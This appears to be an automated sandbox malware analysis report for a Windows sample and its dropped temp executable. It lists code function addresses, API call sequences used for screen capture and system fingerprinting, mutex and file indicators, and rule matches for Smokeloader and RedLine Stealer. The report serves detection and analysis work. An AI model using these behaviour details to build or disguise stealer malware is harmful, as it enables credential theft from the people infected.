        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,3_2_00436980

        System Summary

        barindex
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000003.00000002.2393295937.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_02192357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02192357
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021925FB NtdllDefWindowProc_W,PostQuitMessage,0_2_021925FB
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004071A10_2_004071A1
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004373C90_2_004373C9
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004274740_2_00427474
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0042D4DE0_2_0042D4DE
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004285500_2_00428550
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0043D6680_2_0043D668
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0041669F0_2_0041669F
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004137150_2_00413715
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0040E96A0_2_0040E96A
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0042EAD00_2_0042EAD0
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_00418A9F0_2_00418A9F
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_00436CAF0_2_00436CAF
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_00413EFB0_2_00413EFB
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021BED370_2_021BED37
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A41620_2_021A4162
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021B76DB0_2_021B76DB
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021BD7450_2_021BD745
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021B87B70_2_021B87B7
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0219EBD10_2_0219EBD1
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A69060_2_021A6906
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A397C0_2_021A397C
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021C6F160_2_021C6F16
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A8D060_2_021A8D06
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021BED370_2_021BED37
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043B8703_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004088803_2_00408880
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00421E703_2_00421E70
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004157203_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040CFEC3_2_0040CFEC
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004198403_2_00419840
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004068503_2_00406850
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004278603_2_00427860
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004270703_2_00427070
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004060003_2_00406000
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043080E3_2_0043080E
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043F8203_2_0043F820
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041D0C03_2_0041D0C0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004418A03_2_004418A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041194F3_2_0041194F
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043F1503_2_0043F150
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042B1703_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004039003_2_00403900
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004251003_2_00425100
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004399233_2_00439923
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004271333_2_00427133
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004339303_2_00433930
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004121DB3_2_004121DB
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042A9F73_2_0042A9F7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040E9B03_2_0040E9B0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041825B3_2_0041825B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042EA623_2_0042EA62
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040CA623_2_0040CA62
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00442A603_2_00442A60
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00418A7A3_2_00418A7A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041DAD03_2_0041DAD0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00429ADE3_2_00429ADE
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00425AF03_2_00425AF0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004092A03_2_004092A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00405AB03_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040B2B03_2_0040B2B0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004042B03_2_004042B0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043CB403_2_0043CB40
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042EB5F3_2_0042EB5F
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004083603_2_00408360
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00428B673_2_00428B67
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00437B693_2_00437B69
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00418B793_2_00418B79
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00402B203_2_00402B20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00418B233_2_00418B23
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00441B203_2_00441B20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00432B243_2_00432B24
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004063C03_2_004063C0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00418BC93_2_00418BC9
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042DBF03_2_0042DBF0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004223803_2_00422380
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041BBA03_2_0041BBA0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042BBA03_2_0042BBA0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042EBA13_2_0042EBA1
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042EBB33_2_0042EBB3
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00441BB03_2_00441BB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00441C403_2_00441C40
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004424703_2_00442470
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00426C763_2_00426C76
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041D4003_2_0041D400
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041C4003_2_0041C400
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004174053_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00414C203_2_00414C20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004324263_2_00432426
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00418C2A3_2_00418C2A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004284373_2_00428437
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043443D3_2_0043443D
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004354C43_2_004354C4
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00434CEF3_2_00434CEF
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043A4EF3_2_0043A4EF
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004374AB3_2_004374AB
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041DCB03_2_0041DCB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043ACB03_2_0043ACB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0042FCBC3_2_0042FCBC
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040D5453_2_0040D545
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00425D6A3_2_00425D6A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00435D133_2_00435D13
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00442D203_2_00442D20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043CD273_2_0043CD27
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00420D903_2_00420D90
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043C5A03_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004366103_2_00436610
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004076203_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040AE303_2_0040AE30
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041F6D03_2_0041F6D0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00416ED03_2_00416ED0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041BEE13_2_0041BEE1
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00402EF03_2_00402EF0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00423EFF3_2_00423EFF
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00431E8E3_2_00431E8E
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041A6903_2_0041A690
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0041AF243_2_0041AF24
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00427F303_2_00427F30
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0040DFE23_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004257E03_2_004257E0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00429FE43_2_00429FE4
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004097903_2_00409790
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004427B03_2_004427B0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00441FB03_2_00441FB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007920173_2_00792017
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007820F53_2_007820F5
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007720D73_2_007720D7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007760B73_2_007760B7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075B0973_2_0075B097
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007741663_2_00774166
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007531573_2_00753157
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076C1483_2_0076C148
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007781973_2_00778197
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076B18B3_2_0076B18B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007562673_2_00756267
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075D2533_2_0075D253
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075E2493_2_0075E249
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076D3273_2_0076D327
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077A3053_2_0077A305
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007773B23_2_007773B2
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078F3B73_2_0078F3B7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007624423_2_00762442
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007684C23_2_007684C2
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007545173_2_00754517
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007595073_2_00759507
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007725E73_2_007725E7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007585C73_2_007585C7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076D6673_2_0076D667
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076C6673_2_0076C667
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007566273_2_00756627
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007926D73_2_007926D7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007846A43_2_007846A4
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078268D3_2_0078268D
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078A7563_2_0078A756
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078572B3_2_0078572B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007877123_2_00787712
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075D7AC3_2_0075D7AC
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007868773_2_00786877
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078C8073_2_0078C807
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076A8F73_2_0076A8F7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007578873_2_00757887
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076F9373_2_0076F937
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_007599F73_2_007599F7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00780A753_2_00780A75
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00792A173_2_00792A17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00758AE73_2_00758AE7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00767AE43_2_00767AE4
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078BAD73_2_0078BAD7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00756AB73_2_00756AB7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00769AA73_2_00769AA7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078FA873_2_0078FA87
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00753B673_2_00753B67
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00761BB63_2_00761BB6
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00783B973_2_00783B97
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00789B8A3_2_00789B8A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075EC173_2_0075EC17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075CCC93_2_0075CCC9
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00792CC73_2_00792CC7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077ECC93_2_0077ECC9
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076DD373_2_0076DD37
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00755D173_2_00755D17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00787DD03_2_00787DD0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077EDC63_2_0077EDC6
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078CDA73_2_0078CDA7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00752D873_2_00752D87
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00782D8B3_2_00782D8B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077DE573_2_0077DE57
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077EE1A3_2_0077EE1A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077BE073_2_0077BE07
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077EE083_2_0077EE08
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00764E873_2_00764E87
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00785F7A3_2_00785F7A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00784F563_2_00784F56
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077FF233_2_0077FF23
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0076DF173_2_0076DF17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0078AF173_2_0078AF17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00770FF73_2_00770FF7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00767FFA3_2_00767FFA
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00792F873_2_00792F87
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: String function: 00410710 appears 53 times
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: String function: 021A000F appears 121 times
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: String function: 021A0977 appears 53 times
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: String function: 0040FDA8 appears 125 times
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: String function: 0040F8F9 appears 36 times
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: String function: 00414C10 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: String function: 007583D7 appears 77 times
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: String function: 00408170 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: String function: 00764E77 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1688
        Source: Ljrprfl3BH.exeBinary or memory string: OriginalFileName vs Ljrprfl3BH.exe
        Source: Ljrprfl3BH.exe, 00000000.00000003.2234757230.0000000002200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs Ljrprfl3BH.exe
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs Ljrprfl3BH.exe
        Source: Ljrprfl3BH.exe, 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs Ljrprfl3BH.exe
        Source: Ljrprfl3BH.exe, 00000000.00000003.2264971963.0000000002EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOrehinal4 vs Ljrprfl3BH.exe
        Source: Ljrprfl3BH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000003.00000002.2393295937.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: Ljrprfl3BH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: BF85.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/3
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070977E CreateToolhelp32Snapshot,Module32First,0_2_0070977E
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043B870
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\track_prt[1].htmJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeMutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2828
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile created: C:\Users\user\AppData\Local\Temp\BF85.tmpJump to behavior
        Source: Ljrprfl3BH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
